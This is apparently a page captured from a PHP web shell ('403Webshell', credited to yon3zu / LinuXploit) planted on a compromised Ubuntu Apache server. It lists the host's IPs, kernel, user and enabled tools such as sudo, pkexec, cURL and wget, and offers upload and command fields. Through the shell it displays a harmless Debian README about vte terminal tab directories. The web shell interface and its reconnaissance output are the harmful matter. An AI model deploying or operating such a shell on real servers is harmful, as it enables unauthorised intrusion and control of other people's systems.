403Webshell
Server IP : 104.21.84.107  /  Your IP : 104.23.197.209
Web Server : Apache/2.4.63 (Ubuntu)
System : Linux adminpruebas-Virtual-Machine 6.14.0-37-generic #37-Ubuntu SMP PREEMPT_DYNAMIC Fri Nov 14 22:10:32 UTC 2025 x86_64
User : www-data ( 33)
PHP Version : 8.4.5
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/doc/libvte-2.91-0/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/doc/libvte-2.91-0/README.Debian
vte2.91 for Debian
==================

Making new tabs keep the working directory of the current tab
-------------------------------------------------------------

Several vte2.91-based terminal emulators aim to open new tabs in the same
working directory as the current tab, but this does not work automatically
and some extra configuration is needed.

For bash users, add to ~/.bashrc or /etc/bash.bashrc:

    if [ -e /etc/profile.d/vte-2.91.sh ]; then
        . /etc/profile.d/vte-2.91.sh
    fi

For zsh users, add the same code to ~/.zshrc or /etc/zsh/zshrc.

This is needed because of a limitation of Debian's interactive shells:
/etc/profile.d is only loaded by login shells (it is not loaded by
interactive non-login shells such as those that are typically run by
terminal emulators), and there is no similar mechanism for interactive
shell initialization like bashrc.d (#675008, #894999) and zshrc.d (#776663).

Youez - 2016 - github.com/yon3zu
LinuXploit